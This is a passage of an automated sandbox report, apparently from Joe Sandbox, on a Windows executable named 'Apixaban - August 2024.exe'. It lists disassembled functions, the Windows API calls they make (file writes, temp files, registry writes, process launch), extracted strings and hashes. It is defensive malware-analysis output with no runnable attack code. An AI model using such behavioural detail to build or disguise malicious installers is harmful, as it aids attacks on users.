                                                • Not Executed
                                                control_flow_graph 738 403060-40306e 739 403070-403086 SetFilePointer 738->739 740 40308c-403095 call 40317b 738->740 739->740 743 403175-403178 740->743 744 40309b-4030ae call 405bd7 740->744 747 403161 744->747 748 4030b4-4030c8 call 40317b 744->748 750 403163-403164 747->750 748->743 752 4030ce-4030d1 748->752 750->743 753 4030d3-4030d6 752->753 754 40313d-403143 752->754 757 403172 753->757 758 4030dc 753->758 755 403145 754->755 756 403148-40315f ReadFile 754->756 755->756 756->747 759 403166-40316f 756->759 757->743 760 4030e1-4030eb 758->760 759->757 761 4030f2-403104 call 405bd7 760->761 762 4030ed 760->762 761->747 765 403106-40311b WriteFile 761->765 762->761 766 403139-40313b 765->766 767 40311d-403120 765->767 766->750 767->766 768 403122-403135 767->768 768->760 769 403137 768->769 769->757
                                                APIs
                                                • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                • WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 539440098-2559241417
                                                • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
                                                Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 770 405b83-405b8f 771 405b90-405bc4 GetTickCount GetTempFileNameW 770->771 772 405bd3-405bd5 771->772 773 405bc6-405bc8 771->773 774 405bcd-405bd0 772->774 773->771 775 405bca 773->775 775->774
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405BA1
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1331003597
                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                • Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                • Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                • CloseHandle.KERNEL32(?), ref: 00405695
                                                Strings
                                                • Error launching installer, xrefs: 00405676
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00403345
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-3144792594
                                                • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
